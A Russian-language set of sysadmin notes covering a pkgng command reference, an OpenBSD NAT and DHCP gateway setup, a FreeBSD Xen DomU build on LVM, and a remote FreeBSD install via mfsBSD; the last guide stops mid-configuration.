http://somewhere.org/pkgng/repo1/ # repo2 : http://somewhere.org/pkgng/repo2/ некоторые общеупотребительные опции: -y - всегда отвечать "y [yes]", отменить интерактив -q - "без вывода сообщений на stdout", однако если неверно задано имя пакета вывод на stdout будет (почему просто не выдать код возврата "1"? ) -f - выполнить "насильно" (или полная инфо в случае pkg info) -L - использовать только локальный кеш и запретить апдейт репозитория -r - задать репозиторий который будет использоваться использование шаблонов в пакетном менеджере pkg: -g использовать как shell шаблон -x использовать как регулярное выражение -X использовать как расширенное регулярное выражение например: -g a* или -g "[0-z]*" или -g "*rar" или -g "?c" -x "perl-5*" или "^deco*$" или -x "^mc-*$" или -x "^mc-.*$" -x ".*rar$" и тд и тп справка: # pkg help # pkg help <command> - вызовет man pkg-command или # man pkg-command поиск требуемых пакетов: формат: pkg search pkg-name pkg search [-fDsqop] pkg-name pkg search [-gexXcdfDsqop] pattern # pkg search www/apache22 # pkg search misc/mc # pkg search -x "^mc-*$" (-x поиск по regexp) # pkg search -x "^mc-*" # pkg search -g "?c" (-g поиск по shell global match) # pkg search -g "l?m*" # pkg search -g "[0-z]*" (-g поиск по shell global match - все пакеты) # pkg search -g "[0-z]*" | sort -k 1,1 (показать все с сортировкой) запросить информацию с удаленного репозитория: формат: pkg rquery <query-format> <pkg-name> pkg rquery [-a] [-r reponame] <query-format> pkg rquery -e <evaluation-condition> [-r reponame] <query-format> pkg rquery [-gxX] [-r reponame] <query-format> <pattern> <...> # pkg rquery "шаблон" pkgname %d - зависимоть порта/пакета от других %r - другие зависят от данного порта/пакета %?d - 0/1 наличие зависимостей порта/пакета от других %?r - 0/1 наличие портов/пакетов которые зависят от указанного показать все пакеты удаленного репозитория: # pkg rquery -a "package: %n-%v" # pkg rquery -a "package: %n-%v - %c" (с комментарием) # pkg rquery -a "package: %n-%v size: %sh - %c" (размер + комментарий) посмотреть от каких портов зависит gtar и mc: # pkg rquery "tar depends %?d" gtar (0 - нет зависимостей, 1 - есть) # pkg rquery "tar depends %?d" archivers/rar # pkg rquery "tar depends %do %dv" archivers/rar # pkg rquery "tar depends %do %dv" rar # pkg rquery "tar depends %do %dv" gtar # pkg rquery "tar depends %do %dv" archivers/gtar # pkg rquery "tar depends %do %dv" misc/mc # pkg rquery "pkg %n-%v require next deps: %dn-%dv" bash-4.2.37 посмотреть какие порты требуют gtar и mc: # pkg rquery "tar depends %?r" gtar (0 - нет зависимостей, 1 - есть) # pkg rquery "tar depends %?r" archivers/rar # pkg rquery "tar depends %ro %rv" misc/mc # pkg rquery "pkg %n-%v needs for next packages: %rn-%rv" bash-4.2.37 установка нужного пакета(ов) с локального или удаленного источника: формат: pkg add <pkg-name> pkg add <protocol>://<path>/<pkg-name> # pkg add /path/to/packages/foo-1.2.3.txz (установка локального пакета foo...) # pkg add http://example.org/pkgng-repo/foo-1.2.3.txz # pkg add ftp://example.org/pkgng-repo/foo-1.2.3.txz (установка пакета foo-1.2.3.txz по ftp/http с удаленного репозитория) установка нужного пакета из репозитория: формат: pkg install [-AfgLnqRXxy] [-r reponame] <pkg-origin> ... # pkg install www/apach22 # pkg install archivers/rar # pkg install mc # pkg install -y misc/mc ( -y == переменной среды или pkg.conf ASSUME_ALWAYS_YES ) # pkg install -y -r repo1 audio/mpg123 апгрейд заданного пакета осуществляется опцией -f # pkg install -f пакет # pkg install -fy archivers/rar (принудительно переустановить если уже есть) если со временем название пакетов звисимостей изменилось, а нам нужны пакеты в актуальном состоянии (или для последующего апгрейда) делают так: a) pkg set -o [<oldorigin>:<neworigin>] меняем старую зависимость на новую b) pkg install -fR category/name - переустанавливаем пакет name и рекурсивно все пакеты которые о него зависят (-R - переустановить все пакеты которые зависят от устанавливаемого) # pkg set -o graphics/libglut:graphics/freeglut (заменили libglut на freeglut) # pkg install -Rf graphics/freeglut (установили freeglut и все что от него зависит) или пример с обновлением ветки emacs, создали новый порт editors/emacs и оставили старый как editors/emacs23, который мы хотим оставить, но установлен он у нас был как editors/emacs, выполняем: # pkg set -o editors/emacs:editors/emacs23 устанавливаем без апдейта удаленного репозитория, только через локальный (-L) # pkg install -yL rar-4.1.1,3 unrar-4.20,5 если мы хотим установить пакет который имеет зависимости и впоследствии удалить его разом с зависимостями, его можно установить с пометкой как orphan (сирота) опция -A # pkg install -yAfL mc-4.8.1.1_1 решили удалить его махом вместе с зависимостями - autoremove: # pkg autoremove -y посмотреть какие пакеты были установлены с флагом autoremove: # pkg query -a "installed package %o %v has autoremove flag = %a" или # pkg query -a "installed package %n-%v has autoremove flag = %a" получить информацию от локального репозитория об установленных пакетах: формат: pkg query <query-format> <pkg-name> pkg query [-a] <query-format> pkg query -F <pkg-name> <query-format> pkg query -e <evaluation-condition> <query-format> pkg query [-gxX] <query-format> <pattern> <...> # pkg query - всегда требуется задание формата <query-format> # pkg query "%Fp %Fs %sh" portmaster-3.13.13 # pkg query " %n-%v \\n ports: %o\\n desc: %c\\n home: %w\\n pkg size: %sh" portmaster-3.13.13 запросить информацию о динамических библиотеках пакета: # pkg query %Fp имя_пакета | grep -E '/lib[^/]+\\.so\\.[0-9]+$' показать информацию о всех пакетах БЕЗ и C autoremove флагом: # pkg query -e '%a == 0' '%n-%v' и # pkg query -e '%a == 1' '%o' показать все пакеты больше 50MB: # pkg query -e "%s > 50000000" "%n-%v is bigger than 50MB: %sh" python27-2.7.3_3 is bigger than 50MB: 67 MB # показать все пакеты больше 50MB и были установлены автоматически: # pkg query -e "%s > 50000000 && %a == 1" "%n-%v is bigger than 50MB: %sh and has been automatically installed" аудит установленных пакетов (проверка на известные уязвимости): формат: pkg audit [-Fq] <pkg-name> # pkg audit perl-5.14.2_2 # pkg audit -F perl-5.14.2_2 (скачать базу перед проверкой) аудит сайт: http://portaudit.FreeBSD.org/auditfile.tbz изменение информации в базе установленных пакетов: формат: pkg set [-a] [-A [01]] [-o <oldorigin>:<neworigin>] [-y] [-xXg] <pkg-name> # pkg set -o devel/pkg-config:devel/pkgconf # pkg set -o graphics/libglut:graphics/freeglut установить флаг autoremove для заданного пакета: # pkg set -A 1 mc-4.8.1.1_1 снять флаг autoremove: # pkg set -A 0 mc-4.8.1.1_1 информация по установленным пакетам: формат: pkg info <pkg-name> pkg info -a pkg info [-eDgxXEdrlsqopOfRF] <pkg-name> pkg info [-drlsq] -F <pkg-file> # pkg info deco-3.9_4 Demos Commander, a free Norton Commander clone pkg-1.0 New generation package manager portmaster-3.13.13 Manage your ports without external databases or languages # pkg info -a (-a - все установленные пакеты) deco-3.9_4 Demos Commander, a free Norton Commander clone pkg-1.0 New generation package manager portmaster-3.13.13 Manage your ports without external databases or languages # # pkg info deco (инфо по указанному пакету) deco-3.9_4 Demos Commander, a free Norton Commander clone # # pkg info -f deco (полная инфо по указанному пакету) Name : deco Version : 3.9_4 Origin : misc/deco Prefix : /usr/local Categories : misc Maintainer : ports@FreeBSD.org WWW : http://deco.sourceforge.net/ Comment : Demos Commander, a free Norton Commander clone Flat size : 159 kB Description : A clone of Norton Commander for Unix. Text-based, full featured file manager intuitive interface. WWW: http://deco.sourceforge.net/ # # pkg info -D pkg (-D показать pkg-message) If you are upgrading from the old package format, first run: # pkg2ng # pkg info -d png-1.5.12 png-1.5.12 depends on: # # pkg info -d mc или (pkg info -d mc-4.8.1.1_1) mc-4.8.1.1_1 depends on: gamin-0.1.10_4 gettext-0.18.1.1 gio-fam-backend-2.28.8_1 glib-2.28.8_4 libiconv-1.14 libslang2-2.2.4_3 pcre-8.31 perl-5.14.2_2 pkgconf-0.8.5 png-1.5.12 python27-2.7.3_3 # pkg info -r perl-5.14.2_2 perl-5.14.2_2 is required by: glib-2.28.8_4 gamin-0.1.10_4 gio-fam-backend-2.28.8_1 mc-4.8.1.1_1 посмотреть динамические библиотеки установленные с пакетом: # pkg info -B pkg удаление пакетов: формат: pkg delete [-fgnqRXxy] <pkg-name> ... pkg delete [-nqy] -a # pkg delete rar # pkg delete -y rar # pkg delete -y rar unrar # pkg delete -x ".*rar$" (удаление с использованием regexp) отчет по версиям установленных пакетов: ----------------------------------------- формат: pkg version [-IPR] [-hoqv] [-l limchar] [-L limchar] [-Xxge pattern] [-r reponame] [-O origin] [index] pkg version -t version1 version2 pkg version -T <pkgname> <pattern> # pkg version если существует дерево портов, то оно используется для срванения с версиями установленных пакетов посредством pkg # pkg version -P (использовать дерево портов для сравнения с пакетами) deco-3.9_4 = pkg-1.0 = portmaster-3.13.13 = # # pkg version -R (использовать репозиторий для определения out of date pkg) deco-3.9_4 = pkg-1.0 > portmaster-3.13.13 = # # pkg version -vRL= pkg-1.0 > succeeds remote (remote has 1.0.r5_1) # pkg version -vRL\\< deco-3.9_4 = up-to-date with remote pkg-1.0 > succeeds remote (remote has 1.0.r5_1) portmaster-3.13.13 = up-to-date with remote # pkg version -vRL\\> deco-3.9_4 = up-to-date with remote portmaster-3.13.13 = up-to-date with remote # проверка целостности установленных пакетов: формат: pkg check [-Bdsr] [-vy] [-a | -gxX <pattern>] # pkg check [-Bdsr] [-vy] [-a | -gxX <pattern>] -B - анализ SHLIBS установленных пакетов -d - проверка на отсутствие зависимостей -r - пересчитать размер и checksums -s - найти неверные checksums -v - verbose (использовать чтобы увидеть реально работу) # pkg check -d или -r или -s или поиск принадлежности файла пакету: формат: pkg which [-qo] <file> # pkg which /usr/local/bin/gdbus /usr/local/bin/gdbus was installed by package glib-2.28.8_4 # pkg which /usr/local/bin/idle /usr/local/bin/idle was installed by package python27-2.7.3_3 # pkg which -o /usr/local/bin/idle /usr/local/bin/idle was installed by package lang/python27 # обновить локальную копию репозитория данными из удаленного репозитория: формат: pkg update [-fq] # pkg update -f (принудительно полностью скачать удаленный репозиторий и обновить локальный без сравнения на свежесть локального с удаленным) выполнить апгрейд установленных пакетов: формат: pkg upgrade [-fLnqy] [-r reponame] # pkg upgrade -f (принудительный апгрейд всех пакетов) # pkg upgrade -yf # pkg upgrade -yfL (принудительный апгрейд всех пакетов без обновления репозитория) по умолчанию pkg upgrade сначала обновляет репозиторий (pkg update), затем производит апгрейд всех пакетов. # pkg upgrade -n (посмотреть без реального выполнения апгрейда) прим: не путать с индивидуальным апгрейдом пакета # pkg install -yfR mc-4.8.1.1_1 # pkg install -yfRL mc-4.8.1.1_1 статистика локального и удаленного репозитория: формат: pkg stats [-qlr] # pkg stats Local package database: Installed packages: 3 Disk space occupied: 6932 kB Remote package database(s): Number of repositories: 1 Packages available: 22212 Unique packages: 22212 Total size of packages: 96 GB # pkg stats -l (статистика только по локальной копии репозитория) # pkg stats -r (статистика только по удаленному репозиторию) скачать пакет и его зависимости из удаленного репозитория: формат: pkg fetch [-r reponame] [-yqgxXadL] <pkg-name> [...] # pkg fetch -a (скачать все пакеты) # pkg fetch -yL bash-4.2.37 # pkg fetch -yd clamav-0.97.5_1 (скачать clamav и все пакеты от которых он зависит) пакеты будут сохранены в PKG_CACHEDIR (/var/cache/pkg/All) создание пакетов для дальнейшего использования: формат: pkg create [-n] [-f format] [-o outdir] [-p plist] [-r rootdir] -m manifestdir pkg create [-gnxX] [-f format] [-o outdir] [-r rootdir] pkg-name ... pkg create [-n] [-f format] [-o outdir] [-r rootdir] -a создание пакетов в формате pkg из всех ранее установленных в системе портов или пакетов и сохранение их в /usr/ports/packages/All: # pkg create -a -o /usr/ports/packages/All создание одного пакета в формате pkg установленных ранее из портов: # pkg create -o /usr/ports/packages/All packagename очистка локального кеша - данных об удаленных пакетах которые out-of-date и которые больше не сопровождаются: # pkg clean более здесь расписывать нечего :) создание репозитория: формат: pkg repo [-fq] <repo-path> [rsa-key] пример создания собственного локального репозитория из всех установленных у нас пакетов: # cd /scratch/huge_free_space # pkg create -a # pkg repo . теперь можем использовать собственный репозиторий для установки через pkg add/install регистрация уже установленных пакетов или портов в локальной базе: формат: pkg register [-ld] -f <plist-file> -m <metadatadir> -i <input-path> ... в man'е вроде описано, но как применить непонятно... посмотреть какие пакеты слинкованы со специфичными shared library: формат: pkg shlib <library> # pkg shlib libpkg.so.0 libpkg.so.0 is linked to by the folowing packages: pkg-1.0 # динамическая библиотека задается без пути но включая версию ABI, при поиске используется точное соответствие. прим: непонятно как работает, не показывает явные зависимости, при взведенной переменной SHLIBS как в pkg.conf, так и в среде. dump/restore локальной базы данных: формат: pkg backup -d <dest_file> pkg backup -r <src_file> прозрачная команда: # pkg backup -d /var/tmp/pkgng_db.dump # pkg backup -r /var/tmp/pkgng_db.dump взаимодействие с базами пакетов: формат: pkg shell pkg shell - предоставляет доступ к локальной и удаленной базе пакетов через консоль sqlite, например: # echo 'select * from packages;' | pkg shell # echo 'select origin,name,version,comment from packages;' | pkg shell показать какие есть базы: # echo '.databases' | pkg shell seq name file 0 main /var/db/pkg/local.sqlite какие есть таблицы: # echo '.tables' | pkg shell categories licenses pkg_directories scripts deps mtree pkg_groups shlibs directories options pkg_licenses users files packages pkg_shlibs groups pkg_categories pkg_users схему таблицы: # echo '.schema packages' | pkg shell CREATE TABLE packages (id INTEGER PRIMARY KEY,origin TEXT UNIQUE NOT NULL,name TEXT NOT NULL,version TEXT NOT NULL,comment TEXT NOT NULL,desc TEXT NOT NULL,mtree_id INTEGER REFERENCES mtree(id) ON DELETE RESTRICT ON UPDATE CASCADE,message TEXT,arch TEXT NOT NULL,maintainer TEXT NOT NULL, www TEXT,prefix TEXT NOT NULL,flatsize INTEGER NOT NULL,automatic INTEGER NOT NULL,licenselogic INTEGER NOT NULL,infos TEXT, time INTEGER, pkg_format_version INTEGER); #

Шлюз (NAT) + DHCP-сервер на OpenBSD для начинающих Автор: Калегин Сергей Николаевич [комментарии]

В этой статье я хочу рассказать о своём опыте создания шлюза на базе операционной системы (ОС) OpenBSD, так как, по-моему, это оптимальное решение для большинства организаций, офисов и, в особенности, для дома. Здесь я не буду давать подробные теоретические выкладки, коих и так полно в Интернете и документации, а просто постараюсь кратко и лаконично изложить основные шаги для достижения цели. Но прежде чем начать непосредственно демонстрацию настроек OpenBSD и соответствующего софта, хотелось бы внести некоторую ясность по поводу моих предпочтений. Итак. Почему я выбрал в качестве основы для сервера (шлюза) именно систему OpenBSD, а не какую-то другую? Этот выбор не случайный, а вполне обоснованный, и причин для выбора данной ОС более чем достаточно. Дело в том, что до OpenBSD мне приходилось работать со многими системами (DOS, Windows, Linux, Lindows, BeOS, FreeBSD и т.д.), однако ни одна из них меня настолько не впечатлила своей простотой, целостностью, гибкостью и надёжностью как OpenBSD и, её основа, NetBSD (но последняя заслуживает отдельной статьи). Причём простота заключается не только в управлении самой операционной системой, но и в установке, настройке и нетребовательности к ресурсам компьютера. Ведь для работы данной ОС подходит практически ЛЮБОЙ компьютер (даже Pentium I), а вся установка OpenBSD занимает чуть больше минуты! Разве это не замечательно?... Особенно если посмотреть на это с точки зрения финансово-временных затрат, которые в большинстве случаев играют ключевую роль при выборе и установке сервера как в офисе, так и дома. Да к тому же OpenBSD распространяется свободно и абсолютно бесплатная! Более того, эта система считается самой безопасной ОС в мире! Надеюсь, данных аргументов достаточно для того, чтобы вы хотябы дочитали эту статью до конца, а там решайте сами. Для начала давайте определимся чего мы хотим, что конкретно и как должен делать наш сервер. Если это обычный шлюз (типа "мост"), то достаточно просто включить перенаправление сетевого трафика с одной сетевой карты на другую и всё. Делается это правкой всего двух-трёх конфигурационных файлов. Если же наш сервер должен выполнять ещё какие-то функции, то это уже сложнее, но не намного. Возьмём более или менее стандартную ситуацию. Допустим нам нужно просто-напросто соединить локальную сеть провайдера, типа 10.135.62.0 (класса A), провод от которой приходит к нам в дом или офис, и нашу внутреннюю (локальную) сеть Ethernet, типа 172.18.7.0 (класса B), которая проложена по офису или квартире. Адреса сетей могут быть и другими (и других классов), это несущественно. Практически то же самое представляет собой соединение через ADSL- или кабельный модем, который имеет обычный сетевой выход и выполняет функцию роутера. Плюс к этому, для уменьшения точек (узлов) настройки и облегчения администрирования, на шлюз мы поставим DHCP-сервер, который будет автоматически назначать адреса всем компьютерам локальной сети. Теперь, когда задача ясна, приступим к её решению. Для этого понадобится сделать всего 4 шага: 1) Выбрать компьютер для нашего шлюза (возьмём старый и дешёвый IBM PC Pentium II); 2) Установить и настроить саму ОС (мы будем ставить OpenBSD 4.8 для платформы i386); 3) Настроить пересылку пакетов (трансляцию трафика) между сетевыми интерфейсами; 4) Настроить сервер DHCP (DHCPD). На выполнение всех этих действий уйдёт всего несколько минут! Итак, приступим. 1) Для шлюза можно взять любой старый компьютер (например, приготовленный на выброс или списанный в утиль) или, при его отсутствии, покупаем такой компьютер через Интернет или у знакомых (или берём старьё в другой организации). Стоит он копейки, или даже совсем ничего не стоит, так как это хлам. Также, можно собрать такую машину из старых запчастей, которых в организациях и у компьютерщиков, обычно, навалом! Не забудьте поставить в него 2 сетевые карты (ведь сети у нас 2). 2) Скачиваем с официального сайта http://openbsd.org/ последний (хотя необязательно) стабильный релиз ОС OpenBSD (лучше сразу ISO-образ) для выбранного компьютера и записываем его на CD или DVD (ну или на другой носитель, если вы будете ставить систему с него). Затем вставляем этот диск в наш будущий сервер и грузимся с него. Для начала установки нужно нажать клавишу (букву) "i" (install). Затем вы должны ответить на несколько простых вопросов (типа какой раскладкой вы будете пользоваться, в каком часовом поясе находитесь, каким будет сетевое имя компьютера, к какому DNS-имени (домену) подключиться и т.д.), а также задать настройки сетевых интерфейсов (сетевых карт), хотя это можно сделать и после установки. Здесь хотелось бы дать несколько рекомендаций: - Стандартную раскладку клавиатуры лучше не менять (по умолчанию будет "English US"); - Временной пояс лучше поставить свой (например Europe/Moscow); - Имя машины (системы) можно взять любое, но лучше с указанием на домен, например mytest.lan; - Сетевые интерфейсы в OpenBSD называются по разному, например fxp0 или rtl0 (зависит от чипа на сетевой карте). Смотрите внимательно что и как вы настраиваете и о чём вас спрашивает установщик, иначе потом придётся перенастраивать всё вручную. После того как вы ответили на все вопросы по настройке системы, будет предложено разбить HDD на разделы (без опыта работы с fdisk-ом лучше этого не делать!). В нашем случае компьютер тарый и объём HDD не настолько большой, чтобы его "пилить" на части, поэтому будем использовать весь диск целиком (по умолчанию). Просто нажимаем Enter и идём дальше. Затем будет выдан список пакетов для установки. Тут я рекомендую убрать игры, многопроцессорную поддержку (если у вас в компьютере только один процессор) и всё, что касается графической системы X Window. Делается это очень просто: -game* (затем нажать Enter); -bsd.mp (затем нажать Enter); -x* (затем нажать Enter); Всё. Далее останется дождаться конца установки (примерно 1-2 минуты) и указать какие сервисы (демоны) нужно запускать вместе с системой. Здесь можно отказаться от запуска почти всего кроме, наверное, sshd (это сервер удалённого управления по SSH). После установки желательно перезагрузить компьютер (команда reboot). 3) Теперь у нас есть действующий сервер с уже работающими и подключёнными сетевыми интерфейсами, если конечно вы их правильно настроили при установке. Если нет, тоже не так страшно, просто отредактируйте конфигурационные файлы сетевых карт типа /etc/hostname.fxp0 и /etc/hostname.rtl0 (здесь предполагается, что ваши сетевушки определены как fxp0 и rtl0). Посмотреть список всех подобных файлов можно командой ls, например: ls /etc/hostname.* Чтобы убедиться в правильности настроек, можно вывести параметры всех сетевых интерфейсов с помощью команды ifconfig, например так: ifconfig -a или же просто пустить ping на те адреса, которые вы указали в настройках, например: ping 10.135.62.26 (где 10.135.62.26 IP-адрес от Вашего провайдера или модема) и ping 172.18.7.1 (где 172.18.7.1 IP-адрес Вашего внутреннего интерфейса) Если проверка прошла успешно, переходим к настройкам трансляции сетевого трафика между нашими сетями (NAT). Для этого достаточно включить forwarding (пересылку) в файле /etc/sysctl.conf: net.inet.ip.forwarding=1 (для протокола TCP 4-й версии) и/или net.inet6.ip6.forwarding=1 (для TCP 6-й версии, если она используется) А также настроить встроенный пакетный фильтр (pf) на работу в качестве NAT (Network Address Translation). Делается это в файле конфигурации /etc/pf.conf с помощью параметра nat-to, например так: pass out on $ext_if from 172.18.7.0/16 nat-to 10.135.62.26 В данном случае мы перенаправляем весь трафик из внутренней (локальной) сети 172.18.7.0 на адрес провайдера (или модема) 10.135.62.26. Обратите внимание на переменную $ext_if! Вместо неё должно быть подставлено название внешнего интерфейса (который подключён к сети провайдера). Обычно она определяется в самом начале pf.conf примерно следующим образом: ext_if="fxp0" (если fxp0 имеет адрес 10.135.62.26, как в нашем примере) Ну вот и все настройки NAT-а в OpenBSD. Как видите это делается правкой всего двух конфигов, в которые нужно дописать по одной строчке. Простота и доступность - главные преимущества систем BSD! Осталось только добавить NAT (точнее pf) в автозагрузку. Самый простой способ это сделать - найти и изменить строчку типа "pf=" в файле /etc/rc.conf, должно быть так: pf=YES После перезагрузки вы увидите, что pf был запущен и настроен, а следовательно, все пользователи локальной сети могут подключаться к сети провайдера и наслаждаться доступом в Интернет! 4) Ну и последний штрих в настройке нашего сервера - включение и настройка DHCPD. Эта штука позволит нам автоматически раздавать IP-адреса, ограничивать количество компов в сети, а также изолировать некоторые компьютеры в отдельные сетевые группы не вставая из-за консоли сервера. Причём все настройки делаются в одном единственном файле - /etc/dhcpd.conf, например так: option domain-name-servers 10.135.62.2; subnet 172.18.7.0 netmask 255.255.0.0 { routers 172.18.7.1; range 172.18.7.130 172.18.7.190; } В этом примере мы указываем общий для всех DNS-сервер 10.135.62.2, затем создаём подсеть (блок адресов) из 60 адресов (с 172.18.7.130 по 172.18.7.190) и прописываем для неё шлюз (маршрутизатор) 172.18.7.1. Таким образом, компьютеры локальной сети, при обращении к нашему серверу будут получать свободный адрес из указанного диапазона, шлюз 172.18.7.1 и DNS-сервер 10.135.62.2. И таких подсетей можно сделать сколько угодно с разными настройками. Если же в этот дипазон попал, например, принтер или просто требуется жёсткая привязка компьютера к какому-то IP-адресу, тоже не проблема. Нужно всего лишь указать MAC-адрес сетевой карты этого компа и выделить ему IP, например так: host static-client { hardware ethernet 00:12:25:2a:3c:17; fixed-address 172.18.7.150; } Таким образом мы делаем постоянную привязку IP-адреса 172.18.7.150 к MAC-адресу 00:12:25:2a:3c:17. То есть только компьютер (или принтер) с MAC-ом 00:12:25:2a:3c:17 будет получать IP-шник 172.18.7.150, он будет для этой машины зарезервирован. И, опять же, таких привязок можно сделать сколько угодно, хоть на всю подсеть, например так: subnet 172.18.7.0 netmask 255.255.0.0 { routers 172.18.7.1; range 172.18.7.130 172.18.7.190; host static-client { hardware ethernet 00:12:25:2a:9c:12; fixed-address 172.18.7.140; } host static-client1 { hardware ethernet 00:12:25:2a:3c:17; fixed-address 172.18.7.150; } host static-client2 { hardware ethernet 00:12:25:4b:3c:45; fixed-adress 172.18.7.160; } } В этом примере зарезервированы 3 адреса: 172.18.7.140, 172.18.7.150 и 172.18.7.160. В завершение включаем автоматический запуск данного демона (службы) всё в том же /etc/rc.conf следующей строчкой: dhcpd_flags="" Её просто нужно найти и поменять значение параметра. Ну вот и всё. После перезагрузки компьютера вы увидите запуск всех настроенных демонов (сервисов), а проверить их работу и состояние можно с помощью команды pgrep, например: pgrep -lf dhcpd При этом на экран будет выведен номер процесса (PID) и ссылка на сам DHCP-сервер. Аналогично проверяется работа и других сервисов (демонов), запущенных в OpenBSD. Как видите в создании сервера (шлюза) на базе операционной системы OpenBSD нет ничего сложного и страшного. Попробуйте, у вас обязательно получится!

Подготовка DomU FreeBSD-окружения для выполнения в Linux Dom0 Xen с LVM (доп. ссылка 1) [комментарии]

В качестве хост-системы будет использован сервер на базе Debian GNU/Linux 5, на котором дисковые разделы разбиты с использованием LVM. Для сборки работающего в режиме паравиртуализации ядра FreeBSD и формирования образа системы понадобится уже установленная FreeBSD. В простейшем случае можно воспользоваться VirtualBox для временной установки FreeBSD. Заходим в существующую FreeBSD систему и подготавливаем дисковый образ /tmp/freebsd.img для Xen. cd /usr/src truncate -s 1G /tmp/freebsd.img Привязываем файл с дисковым образом к устройству /dev/md0 mdconfig -f freebsd.img Разбиваем разделы, форматируем и монтируем в /mnt: fdisk -BI /dev/md0 bsdlabel -wB md0s1 newfs -U md0s1a mount /dev/md0s1a /mnt Собираем мир и ядро с паравиртуальными драйверами Xen и устанавливаем в директорию /mnt: make buildworld make buildkernel KERNCONF=XEN make DESTDIR=/mnt installworld make DESTDIR=/mnt installkernel KERNCONF=XEN make DESTDIR=/mnt distribution В /mnt/etc/ttys добавляем строку с описанием терминала xc0 xc0 "/usr/libexec/getty Pc" vt100 on secure В /mnt/etc/fstab прописываем параметры монтирования корня: /dev/ad0s1a / ufs rw 0 0 Отмонтируем сформированный образ и скопируем его на хост-систему, на которой будет работать DomU: umount /mnt mdconfig -d -u 0 bzip2 -v9 /tmp/freebsd.img scp /tmp/freebsd.img.bz2 user@dom0-host.example.com:/tmp/freebsd.img.bz2 Отдельно копируем ядро с паравиртуальными драйверами: scp /usr/obj/usr/srcsys/XEN/kernel user@dom0-host.example.com:/tmp/freebsd_8.2-RC1_kernel Настраиваем Dom0 Подготавливаем LVM-разделы, которые будут использоваться для работы FreeBSD. Создадим два раздела - один для изменения размера рабочего раздела и второй - рабочий раздел, на котором будет работать гостевая система. Создаем LVM-разделы в уже присутствующей физической группе xen-vol: lvcreate -L1000 -n freebsdmaint.example.com xen-vol lvcreate -L110000 -n freebsd-dom0.example.com xen-vol копируем ранее созданный образ в данные разделы: dd if=freebsd.img of=/dev/xen-vol/freebsdmaint.example.com bs=1M dd if=freebsd.img of=/dev/xen-vol/freebsd-dom0.example.com bs=1M Конфигурируем Xen: Создаем два файла конфигурации: первый для обслуживания изменения размера раздела и второй для рабочего виртуального окружения (отдельный раздел нужен так как мы не можем переконфигурировать текущий раздел без его отмонтирования, смонтировать файл через "mount -o loop" мы не можем так как в Linux отсутствует полноценная поддержка UFS). Ранее подготовленное ядро копируем в /xen/kernels/freebsd_8.2-RC1_kernel Окружение для изменения размера дискового раздела freebsdmaint.example.conf.cfg: kernel = "/xen/kernels/freebsd_8.2-RC1_kernel" vcpus = '1' # 1 CPU memory = '64' # 64 Мб ОЗУ disk = [ 'phy:/dev/xen-vol/freebsdmaint.example.com,hda,w', 'phy:/dev/xen-vol/freebsd-dom0.example.com,hdb,w' ] name = 'freebsdmaint.example.com' vif = [ 'bridge=eth0,mac=00:16:3E:62:DB:03' ] extra = 'xencons=tty1' extra = "boot_verbose" extra += ",boot_single" extra += ",kern.hz=100" extra += ",vfs.root.mountfrom=ufs:/dev/ad0s1a" Рабочее окружение freebsd-dom0.example.conf.cfg (отличается от предыдущей конфигурации указанием только одного раздела freebsd-dom0.example.com): kernel = "/xen/kernels/freebsd_8.2-RC1_kernel" vcpus = '1' memory = '64' disk = [ 'phy:/dev/xen-vol/freebsd-dom0.example.com,hda,w' ] name = 'freebsd-dom0.example.com' vif = [ 'bridge=eth0,mac=00:16:3E:62:DB:03' ] extra = 'xencons=tty1' extra = "boot_verbose" extra += ",boot_single" extra += ",kern.hz=100" extra += ",vfs.root.mountfrom=ufs:/dev/ad0s1a" Запускаем обслуживающее окружение: xm create -c freebsdmaint.example.conf.cfg Изменяем размер рабочего раздела, который виден как /dev/ad1s1a (после запуска fdisk на первые два вопроса отвечаем 'y', после запроса размера указываем размер основного раздела как "число Мб * 2048"): fdisk -u /dev/ad1 ******* Working on device /dev/ad1 ******* parameters extracted from in-core disklabel are: cylinders=14023 heads=255 sectors/track=63 (16065 blks/cyl) Figures below won't work with BIOS for partitions not in cyl 1 parameters to be used for BIOS calculations are: cylinders=14023 heads=255 sectors/track=63 (16065 blks/cyl) Do you want to change our idea of what BIOS thinks ? [n] n Media sector size is 512 Warning: BIOS sector numbering starts with sector 1 Information from DOS bootblock is: The data for partition 1 is: sysid 165 (0xa5),(FreeBSD/NetBSD/386BSD) start 63, size 2088387 (1019 Meg), flag 80 (active) beg: cyl 0/ head 1/ sector 1; end: cyl 129/ head 254/ sector 63 Do you want to change it? [n] y ... Supply a decimal value for "size" [2088387] fdisk: WARNING: partition does not end on a cylinder boundary fdisk: WARNING: this may confuse the BIOS or some operating systems Correct this automatically? [n] y Should we write new partition table? [n] y Изменяем размер слайса: bsdlabel -e /dev/ad1s1 # size offset fstype [fsize bsize bps/cpg] a: 2088351 16 unused 0 0 c: 2088387 0 unused 0 0 # "raw" part, don't edit Не трогаем значение "raw" и правим размер слайса "a", приписав туда вычисленное на прошлом шаге значение дискового раздела минус 16 байт. Т.е. получаем после правки (raw-значение рассчитается автоматически): # size offset fstype [fsize bsize bps/cpg] a: 225279416 16 unused 0 0 c: 225279432 0 unused 0 0 # "raw" part, don't edit Запускаем growfs для расширения существующей файловой системы: growfs /dev/ad1s1a Выключаем обслуживающую VM и запускаем основную. Внимание, одновременно основной и обслуживающий VM запускать нельзя, так как они работают с одинаковым дисковым разделом freebsd-dom0.example.com.

Удаленная установка FreeBSD через SSH (доп. ссылка 1) (доп. ссылка 2) Автор: Панфилов Алексей [комментарии]

Задача: Установка FreeBSD на удаленном сервере, к которому имеется доступ только через SSH и на котором отсутствует возможность обновления FreeBSD штатными средствами (например, установлен Linux или очень старая версия FreeBSD). Решение: 1. Сформировать отдельный загрузочный образ с настроенными параметрами сетевого соединения и активным ssh-сервером. 2. Записать данный образ на диск удаленного сервера и перезагрузиться. Готовим загрузочный образ на локальной FreeBSD-системе. Загружаем установочный ISO-образ: fetch ftp://ftp.freebsd.org/pub/FreeBSD/releases/amd64/ISO-IMAGES/8.1/FreeBSD-8.1-RELEASE-amd64-disc1.iso Загружаем mfsBSD: fetch http://people.freebsd.org/~mm/mfsbsd/mfsbsd-latest.tar.gz Распаковываем и переходим в получившуюся директорию: tar xvzf mfsbsd-1.0-beta1.tar.gz cd mfsbsd-1.0-beta1/conf/ Правим файлы конфигурации и добавляем параметры сетевого соединения удаленного хоста: На базе примера loader.conf.sample создаем loader.conf geom_uzip_load="YES" mfs_load="YES" mfs_type="mfs_root" mfs_name="/mfsroot" tmpfs_load="YES" vfs.root.mountfrom="ufs:/dev/md0" mfsbsd.rootpw="123456" На базе примера rc.conf.sample создаем rc.conf # 